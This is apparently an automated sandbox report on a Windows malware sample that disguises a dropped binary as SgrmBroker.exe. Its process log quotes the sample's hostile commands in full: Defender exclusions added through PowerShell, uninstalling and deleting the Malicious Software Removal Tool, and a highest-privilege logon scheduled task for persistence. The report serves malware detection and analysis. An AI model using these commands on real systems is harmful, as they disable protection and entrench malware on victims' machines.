Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/Z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/y
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Q
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/R
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/u
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF1530 OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,24_2_00007FF6D9CF1530
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFDB59 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CreateWaitableTimerExW,HeapFree,CreateWaitableTimerExW,HeapFree,HeapFree,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,WaitOnAddress,WaitOnAddress,GetLastError,CreateWaitableTimerExW,WakeByAddressSingle,WaitOnAddress,WaitOnAddress,GetLastError,WakeByAddressSingle,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,GetLastError,SetClipboardData,GlobalFree,GetLastError,GetLastError,GlobalFree,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,RevertToSelf,WakeByAddressSingle,HeapFree,CreateWaitableTimerExW,GetLastError,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,24_2_00007FF6D9CFDB59
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree,24_2_00007FF6D9CFBF68

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeFile dump: SppExtComObj.exe.5.dr 706740224Jump to dropped file
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DCDA50 GetProcessTimes,GetLastError,GetSystemTimes,GetLastError,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLastError,GetLastError,CloseHandle,GetLastError,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,HeapFree,HeapFree,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetLastError,K32GetModuleFileNameExW,HeapFree,HeapFree,HeapFree,GetLastError,CloseHandle,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,VirtualQueryEx,ReadProcessMemory,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,RtlFreeHeap,HeapFree,HeapFree,HeapFree,VirtualQueryEx,HeapFree,HeapFree,HeapFree,RtlFreeHeap,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,24_2_00007FF6D9DCDA50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DCF390 NtQueryInformationProcess,GetErrorInfo,NtQueryInformationProcess,HeapFree,HeapFree,24_2_00007FF6D9DCF390
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree,24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree,24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DB9FF0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,24_2_00007FF6D9DB9FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8490639D112_2_00007FF8490639D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8490630E912_2_00007FF8490630E9
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DD0ED024_2_00007FF6D9DD0ED0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF8A9024_2_00007FF6D9CF8A90
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF168024_2_00007FF6D9CF1680
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF7E4024_2_00007FF6D9CF7E40
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DCDA5024_2_00007FF6D9DCDA50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DBFA1024_2_00007FF6D9DBFA10
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DBADE024_2_00007FF6D9DBADE0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFAD9824_2_00007FF6D9CFAD98
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF414024_2_00007FF6D9CF4140
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DD08F024_2_00007FF6D9DD08F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D4AF8024_2_00007FF6D9D4AF80
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF8B9D24_2_00007FF6D9CF8B9D
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DDEF4024_2_00007FF6D9DDEF40
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFBF6824_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF8B9D24_2_00007FF6D9CF8B9D
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D5030024_2_00007FF6D9D50300
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFAEE224_2_00007FF6D9CFAEE2
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DE0AA024_2_00007FF6D9DE0AA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D2DAB024_2_00007FF6D9D2DAB0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFD2B024_2_00007FF6D9CFD2B0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF32A024_2_00007FF6D9CF32A0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D03A5024_2_00007FF6D9D03A50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D0C65024_2_00007FF6D9D0C650
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF321024_2_00007FF6D9CF3210
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DC723024_2_00007FF6D9DC7230
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D08A0024_2_00007FF6D9D08A00
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D0EE1024_2_00007FF6D9D0EE10
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D011D024_2_00007FF6D9D011D0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D085F024_2_00007FF6D9D085F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DC45D024_2_00007FF6D9DC45D0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D0DDA024_2_00007FF6D9D0DDA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D40DB024_2_00007FF6D9D40DB0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DE018024_2_00007FF6D9DE0180
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D0614024_2_00007FF6D9D06140
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF497024_2_00007FF6D9CF4970
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D2A13024_2_00007FF6D9D2A130
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF153024_2_00007FF6D9CF1530
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFBF6824_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D2B0F024_2_00007FF6D9D2B0F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D114F024_2_00007FF6D9D114F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DC64C024_2_00007FF6D9DC64C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D24CC024_2_00007FF6D9D24CC0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF4CE024_2_00007FF6D9CF4CE0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D29CA024_2_00007FF6D9D29CA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D244A024_2_00007FF6D9D244A0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DE648024_2_00007FF6D9DE6480
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D020A024_2_00007FF6D9D020A0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF2C5024_2_00007FF6D9CF2C50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DDF86024_2_00007FF6D9DDF860
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D3006024_2_00007FF6D9D30060
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF2C7024_2_00007FF6D9CF2C70
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DBB05024_2_00007FF6D9DBB050
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D3402024_2_00007FF6D9D34020
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DC640024_2_00007FF6D9DC6400
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DCC3E024_2_00007FF6D9DCC3E0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D2D3C024_2_00007FF6D9D2D3C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D43BC024_2_00007FF6D9D43BC0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D2AFA024_2_00007FF6D9D2AFA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D07B8024_2_00007FF6D9D07B80
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D0D38024_2_00007FF6D9D0D380
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9D50F9024_2_00007FF6D9D50F90
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF4B5024_2_00007FF6D9CF4B50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CFDB5924_2_00007FF6D9CFDB59
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: classification engineClassification label: mal100.evad.winEXE@27/6@0/0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DD0ED0 CoCreateInstance,SysFreeString,CoSetProxyBlanket,GetErrorInfo,GetErrorInfo,SysFreeString,GetErrorInfo,24_2_00007FF6D9DD0ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeFile created: C:\Users\Public\Pictures_OldJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:304:WilStaging_02
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeMutant created: \Sessions\1\BaseNamedObjects\HgSyVtdfIS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urbrehpo.yuf.ps1Jump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
